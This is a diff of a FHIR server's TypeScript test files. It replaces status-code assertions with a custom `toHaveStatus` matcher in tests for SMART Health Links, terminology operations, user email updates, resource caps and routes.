@@ -310,7 +310,7 @@ describe('SMART Health operations', () => {
           v: 1,
         }),
       });
-    expect(unknownGeneratedLinkResponse.status).toBe(200);
+    expect(unknownGeneratedLinkResponse).toHaveStatus(200);
     expect(getBooleanParameter(unknownGeneratedLinkResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(unknownGeneratedLinkResponse.body, 'error')).toContain('recipient');
 
@@ -319,7 +319,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(missingPatientResponse.status).toBe(404);
+    expect(missingPatientResponse).toHaveStatus(404);
   });
 
   test('Generate direct SMART Health Link and resolve payload', async () => {
@@ -336,7 +336,7 @@ describe('SMART Health operations', () => {
         label: 'Test CMS Link',
         includeQrCode: true,
       });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const shlink = getStringParameter(generateResponse.body, 'shlink');
     expect(shlink).toMatch(/^shlink:\//);
@@ -367,12 +367,12 @@ describe('SMART Health operations', () => {
     expect(payload.v).toBe(1);
 
     const payloadResponse = await request(app).get(directUrl.pathname).query({ recipient: 'Test Recipient' });
-    expect(payloadResponse.status).toBe(200);
+    expect(payloadResponse).toHaveStatus(200);
     expect(payloadResponse.get('Content-Type')).toContain('application/jose');
     expect(payloadResponse.text.split('.')).toHaveLength(5);
 
     const missingRecipientResponse = await request(app).get(directUrl.pathname);
-    expect(missingRecipientResponse.status).toBe(400);
+    expect(missingRecipientResponse).toHaveStatus(400);
     expect(missingRecipientResponse.body.error).toContain('recipient');
 
     const resolveResponse = await request(app)
@@ -380,7 +380,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink, recipient: 'Test Recipient' });
-    expect(resolveResponse.status).toBe(200);
+    expect(resolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(resolveResponse.body, 'valid')).toBe(true);
     expect(getStringParameter(resolveResponse.body, 'recipient')).toBe('Test Recipient');
     expect(getStringParameter(resolveResponse.body, 'sourceOrigin')).toBe(directUrl.origin);
@@ -421,7 +421,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(resolveResponse.status).toBe(200);
+    expect(resolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(resolveResponse.body, 'valid')).toBe(true);
 
     const fetchCall = fetchSpy.mock.calls.at(-1);
@@ -469,7 +469,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(resolveResponse.status).toBe(200);
+    expect(resolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(resolveResponse.body, 'valid')).toBe(true);
     expect(getStringParameter(resolveResponse.body, 'warning')).toContain('expired');
 
@@ -503,7 +503,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(httpErrorResponse.status).toBe(200);
+    expect(httpErrorResponse).toHaveStatus(200);
     expect(getBooleanParameter(httpErrorResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(httpErrorResponse.body, 'error')).toContain('HTTP 410');
     expect(getStringParameter(httpErrorResponse.body, 'error')).not.toContain('Gone');
@@ -526,7 +526,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(unsupportedContentTypeResponse.status).toBe(200);
+    expect(unsupportedContentTypeResponse).toHaveStatus(200);
     expect(getBooleanParameter(unsupportedContentTypeResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(unsupportedContentTypeResponse.body, 'error')).toContain(
       'Unsupported SMART Health Link content type'
@@ -551,7 +551,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(tooLargeResponse.status).toBe(200);
+    expect(tooLargeResponse).toHaveStatus(200);
     expect(getBooleanParameter(tooLargeResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(tooLargeResponse.body, 'error')).toContain('too large');
 
@@ -568,7 +568,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(unsupportedFlagResponse.status).toBe(200);
+    expect(unsupportedFlagResponse).toHaveStatus(200);
     expect(getBooleanParameter(unsupportedFlagResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(unsupportedFlagResponse.body, 'error')).toContain('Only direct SMART Health Links');
 
@@ -584,7 +584,7 @@ describe('SMART Health operations', () => {
         }),
         recipient: 'Test Recipient',
       });
-    expect(missingFlagResponse.status).toBe(200);
+    expect(missingFlagResponse).toHaveStatus(200);
     expect(getBooleanParameter(missingFlagResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(missingFlagResponse.body, 'error')).toContain('Only direct SMART Health Links');
 
@@ -603,7 +603,7 @@ describe('SMART Health operations', () => {
         exp: Math.floor(Date.now() / 1000) + 300,
         passcode: '123456',
       });
-    expect(passcodeResponse.status).toBe(400);
+    expect(passcodeResponse).toHaveStatus(400);
     expect(JSON.stringify(passcodeResponse.body)).toContain('Passcode is not supported');
 
     const missingExpResponse = await request(app)
@@ -611,7 +611,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ mode: 'direct' });
-    expect(missingExpResponse.status).toBe(400);
+    expect(missingExpResponse).toHaveStatus(400);
     expect(JSON.stringify(missingExpResponse.body)).toContain('Expected exp');
 
     const expiredResponse = await request(app)
@@ -619,7 +619,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ mode: 'direct', exp: Math.floor(Date.now() / 1000) - 60 });
-    expect(expiredResponse.status).toBe(400);
+    expect(expiredResponse).toHaveStatus(400);
     expect(JSON.stringify(expiredResponse.body)).toContain('Expected exp to be in the future');
   });
 
@@ -634,7 +634,7 @@ describe('SMART Health operations', () => {
         mode: 'direct',
         exp: Math.floor(Date.now() / 1000) + 300,
       });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const directUrl = new URL(getStringParameter(generateResponse.body, 'url'));
     const smartHealthLink = await readGeneratedSmartHealthLink(directUrl.pathname);
@@ -643,7 +643,7 @@ describe('SMART Health operations', () => {
     await getGlobalSystemRepo().deleteResource('Binary', binaryId);
 
     const payloadResponse = await request(app).get(directUrl.pathname).query({ recipient: 'Test Recipient' });
-    expect(payloadResponse.status).toBe(404);
+    expect(payloadResponse).toHaveStatus(404);
     expect(payloadResponse.body.error).toContain('payload not found');
 
     const resolveResponse = await request(app)
@@ -651,7 +651,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ shlink: getStringParameter(generateResponse.body, 'shlink'), recipient: 'Test Recipient' });
-    expect(resolveResponse.status).toBe(200);
+    expect(resolveResponse).toHaveStatus(200);
     expect(getBooleanParameter(resolveResponse.body, 'valid')).toBe(false);
     expect(getStringParameter(resolveResponse.body, 'error')).toContain('payload not found');
   });
@@ -667,7 +667,7 @@ describe('SMART Health operations', () => {
         mode: 'direct',
         exp: Math.floor(Date.now() / 1000) + 300,
       });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const directUrl = new URL(getStringParameter(generateResponse.body, 'url'));
     const smartHealthLink = await readGeneratedSmartHealthLink(directUrl.pathname);
@@ -676,7 +676,7 @@ describe('SMART Health operations', () => {
     await updateGeneratedSmartHealthLink(smartHealthLink);
 
     const payloadResponse = await request(app).get(directUrl.pathname).query({ recipient: 'Test Recipient' });
-    expect(payloadResponse.status).toBe(404);
+    expect(payloadResponse).toHaveStatus(404);
     expect(payloadResponse.body.error).toContain('payload not found');
   });
 
@@ -688,7 +688,7 @@ describe('SMART Health operations', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({ passcode: '123456' });
-    expect(generateResponse.status).toBe(200);
+    expect(generateResponse).toHaveStatus(200);
 
     const manifestUrl = new URL(getStringParameter(generateResponse.body, 'manifestUrl'));
     const smartHealthLink = await readGeneratedSmartHealthLink(manifestUrl.pathname);
@@ -700,7 +700,7 @@ describe('SMART Health operations', () => {
       .post(manifestUrl.pathname)
       .set('Content-Type', ContentType.JSON)
       .send({ passcode: '123456' });
-    expect(manifestResponse.status).toBe(200);
+    expect(manifestResponse).toHaveStatus(200);
     expect(manifestResponse.body.files).toStrictEqual([]);
   });
 });
@@ -711,7 +711,7 @@ async function createPatient(): Promise<Patient> {
     .set('Authorization', 'Bearer ' + accessToken)
     .set('Content-Type', ContentType.FHIR_JSON)
     .send({ resourceType: 'Patient', name: [{ given: ['Alice'], family: 'Smith' }] });
-  expect(response.status).toBe(201);
+  expect(response).toHaveStatus(201);
   return response.body as Patient;
 }
 

--- a/packages/server/src/fhir/operations/structuredefinitionexpandprofile.test.ts
+++ b/packages/server/src/fhir/operations/structuredefinitionexpandprofile.test.ts
@@ -27,7 +27,7 @@ describe('StructureDefinition $expand-profile', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(sd);
-      expect(res.status).toStrictEqual(201);
+      expect(res).toHaveStatus(201);
     }
   }
 
@@ -61,7 +61,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile?url=${profileUrl}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const bundle = res.body as Bundle<StructureDefinition>;
@@ -82,7 +82,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile?url=${profileUrl}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const bundle = res.body as Bundle<StructureDefinition>;
@@ -101,7 +101,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile?url=${profileUrl}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Profile URL not specified', async () => {
@@ -109,7 +109,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Circuit breaker for deeply nested profiles', async () => {
@@ -122,7 +122,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile?url=${profileUrl}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<StructureDefinition>;
     expect(bundle.entry?.length).toStrictEqual(sds.length);
     for (const entry of bundle.entry || []) {
@@ -140,7 +140,7 @@ describe('StructureDefinition $expand-profile', () => {
       .post(`/fhir/R4/StructureDefinition/$expand-profile?url=${profileUrl}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<StructureDefinition>;
     expect(bundle.entry?.length).toStrictEqual(sds.length - 1); // -1 because the last extension was not recursed due to circuit breaker
 
@@ -231,7 +231,7 @@ async function createNestedStructureDefinitions(
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(sd);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
   }
 
   return sds;

--- a/packages/server/src/fhir/operations/subsumes.test.ts
+++ b/packages/server/src/fhir/operations/subsumes.test.ts
@@ -39,7 +39,7 @@ describe('CodeSystem subsumes', () => {
           { name: 'codeB', valueCode: 'ITWINBRO' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('subsumes');
@@ -58,7 +58,7 @@ describe('CodeSystem subsumes', () => {
           { name: 'codeB', valueCode: 'SIGOTHR' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('subsumed-by');
@@ -77,7 +77,7 @@ describe('CodeSystem subsumes', () => {
           { name: 'codeB', valueCode: 'INLAW' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('equivalent');
@@ -96,7 +96,7 @@ describe('CodeSystem subsumes', () => {
           { name: 'codeB', valueCode: 'VET' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('not-subsumed');
@@ -114,7 +114,7 @@ describe('CodeSystem subsumes', () => {
           { name: 'codeA', valueCode: 'SIB' },
         ],
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.resourceType).toStrictEqual('OperationOutcome');
   });
 
@@ -123,7 +123,7 @@ describe('CodeSystem subsumes', () => {
       .get(`/fhir/R4/CodeSystem/$subsumes?system=${system}&codeA=SIB&codeB=ITWINBRO`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('subsumes');
@@ -134,7 +134,7 @@ describe('CodeSystem subsumes', () => {
       .get(`/fhir/R4/CodeSystem?url=${system}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
     const codeSystem = (res.body as Bundle).entry?.[0]?.resource;
 
@@ -142,7 +142,7 @@ describe('CodeSystem subsumes', () => {
       .get(`/fhir/R4/CodeSystem/${codeSystem?.id}/$subsumes?codeA=SIB&codeB=ITWINBRO`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'outcome')?.valueCode).toBe('subsumes');

--- a/packages/server/src/fhir/operations/update-user-email.test.ts
+++ b/packages/server/src/fhir/operations/update-user-email.test.ts
@@ -62,7 +62,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
     expect(updated.email).toStrictEqual(newEmail);
   });
@@ -95,7 +95,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
 
     expect(updated.email).toStrictEqual(newEmail);
@@ -147,7 +147,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Requires Project-scoped user', async () => {
@@ -177,7 +177,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Cannot alter user from other Project', async () => {
@@ -208,7 +208,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Permitted for Super Admin', async () => {
@@ -245,7 +245,7 @@ describe('User/$update-email', () => {
           { name: 'skipEmailVerification', valueBoolean: true },
         ],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const updated = res.body as User;
 
     expect(updated.email).toStrictEqual(newEmail);

--- a/packages/server/src/fhir/operations/valuesetvalidatecode.test.ts
+++ b/packages/server/src/fhir/operations/valuesetvalidatecode.test.ts
@@ -56,7 +56,7 @@ describe('ValueSet validate-code', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(testValueSet);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     valueSet = res.body as ValueSet;
   });
 
@@ -76,7 +76,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system, code: 'WARD' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -109,7 +109,7 @@ describe('ValueSet validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'url', valueUri: valueSet.url }, ...params],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -128,7 +128,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system, code: 'RETIREE' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(false);
@@ -147,7 +147,7 @@ describe('ValueSet validate-code', () => {
           { name: 'display', valueString: 'ant' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(false);
@@ -166,7 +166,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system: 'http://example.com/other', code: 'foo' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(false);
@@ -185,7 +185,7 @@ describe('ValueSet validate-code', () => {
           { name: 'code', valueCode: 'RETIREE' },
         ],
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.resourceType).toStrictEqual('OperationOutcome');
   });
 
@@ -201,7 +201,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system, code: 'NOK' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -220,7 +220,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system, code: 'PEDC' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -239,7 +239,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system: 'http://loinc.org', code: '10727-6' } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -259,7 +259,7 @@ describe('ValueSet validate-code', () => {
           { name: 'display', valueString: 'Cat parasites' },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(false);
@@ -271,7 +271,7 @@ describe('ValueSet validate-code', () => {
       .get(`/fhir/R4/ValueSet/$validate-code?url=${valueSet.url}&system=${system}&code=WARD`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -283,7 +283,7 @@ describe('ValueSet validate-code', () => {
       .get(`/fhir/R4/ValueSet/${valueSet.id}/$validate-code?system=${system}&code=WARD`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -299,7 +299,7 @@ describe('ValueSet validate-code', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'coding', valueCoding: { system, code: 'WARD' } }],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);
@@ -318,7 +318,7 @@ describe('ValueSet validate-code', () => {
         status: 'active',
         compose: { include: [{ system }] },
       } satisfies ValueSet);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     const vs = res.body as ValueSet;
 
     const res2 = await request(app)
@@ -332,7 +332,7 @@ describe('ValueSet validate-code', () => {
           { name: 'coding', valueCoding: { system, code: randomUUID() } },
         ],
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.resourceType).toStrictEqual('Parameters');
     const output = res2.body as Parameters;
     expect(output.parameter?.find((p) => p.name === 'result')?.valueBoolean).toBe(true);

--- a/packages/server/src/fhir/resource-cap.test.ts
+++ b/packages/server/src/fhir/resource-cap.test.ts
@@ -51,22 +51,22 @@ describe('FHIR Resource Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app).get('/fhir/R4/Patient').auth(accessToken, { type: 'bearer' }).send();
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(422);
+    expect(res4).toHaveStatus(422);
   });
 
   test('Allows requests above resource cap when rate limits are disabled', async () => {
@@ -85,13 +85,13 @@ describe('FHIR Resource Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
   });
 
   test('Loads current count', async () => {
@@ -112,16 +112,16 @@ describe('FHIR Resource Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(422);
+    expect(res2).toHaveStatus(422);
 
     const res3 = await request(app).get('/fhir/R4/Patient').auth(accessToken, { type: 'bearer' }).send();
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
   });
 
   test('Expunge counteracts create', async () => {
@@ -140,26 +140,26 @@ describe('FHIR Resource Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const patient = res.body as Patient;
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(422);
+    expect(res2).toHaveStatus(422);
 
     const res3 = await request(app)
       .post(`/fhir/R4/Patient/${patient.id}/$expunge`)
       .auth(accessToken, { type: 'bearer' })
       .send();
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
   });
 
   test('Allows transaction under limit', async () => {
@@ -185,7 +185,7 @@ describe('FHIR Resource Limits', () => {
           { request: { method: 'POST', url: 'Patient' }, resource: { resourceType: 'Patient' } },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Blocks oversized transaction bundle', async () => {
@@ -212,6 +212,6 @@ describe('FHIR Resource Limits', () => {
           { request: { method: 'POST', url: 'Patient' }, resource: { resourceType: 'Patient' } },
         ],
       } satisfies Bundle);
-    expect(res.status).toBe(422);
+    expect(res).toHaveStatus(422);
   });
 });

--- a/packages/server/src/fhir/routes.test.ts
+++ b/packages/server/src/fhir/routes.test.ts
@@ -68,7 +68,7 @@ describe('FHIR Routes', () => {
             },
           ],
         });
-      expect(res.status).toBe(201);
+      expect(res).toHaveStatus(201);
       if (token === accessToken) {
         testPatient = res.body as WithId<Patient>;
         patientId = testPatient.id;
@@ -83,7 +83,7 @@ describe('FHIR Routes', () => {
 
   test('Get CapabilityStatement anonymously', async () => {
     const res = await request(app).get(`/fhir/R4/metadata`);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('CapabilityStatement');
   });
 
@@ -91,19 +91,19 @@ describe('FHIR Routes', () => {
     const res = await request(app)
       .get(`/fhir/R4/metadata`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('CapabilityStatement');
   });
 
   test('Get versions anonymously', async () => {
     const res = await request(app).get(`/fhir/R4/$versions`);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({ versions: ['4.0'], default: '4.0' });
   });
 
   test('Get SMART-on-FHIR configuration', async () => {
     const res = await request(app).get(`/fhir/R4/.well-known/smart-configuration`);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toStrictEqual('application/json; charset=utf-8');
 
     // Required fields: https://build.fhir.org/ig/HL7/smart-app-launch/conformance.html#response
@@ -119,7 +119,7 @@ describe('FHIR Routes', () => {
     expect(res.body.introspection_endpoint).toMatch(/\/oauth2\/introspect$/);
 
     const res2 = await request(app).get(`/fhir/R4/.well-known/smart-styles.json`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.headers['content-type']).toStrictEqual('application/json; charset=utf-8');
   });
 
@@ -129,7 +129,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send('not-json');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test.each<['standard' | 'legacy']>([['standard'], ['legacy']])(
@@ -143,7 +143,7 @@ describe('FHIR Routes', () => {
         .set('Authorization', 'Bearer ' + token)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(patientToCreate);
-      expect(res.status).toBe(201);
+      expect(res).toHaveStatus(201);
       expect(res.body.resourceType).toStrictEqual('Patient');
       expect(res.headers.location).toContain('Patient');
       expect(res.headers.location).toContain(res.body.id);
@@ -151,7 +151,7 @@ describe('FHIR Routes', () => {
       const res2 = await request(app)
         .get(`/fhir/R4/Patient/` + patient.id)
         .set('Authorization', 'Bearer ' + token);
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
       if (jsonFormat === 'standard') {
         expect(patient.identifier).toBeUndefined();
       } else {
@@ -166,7 +166,7 @@ describe('FHIR Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
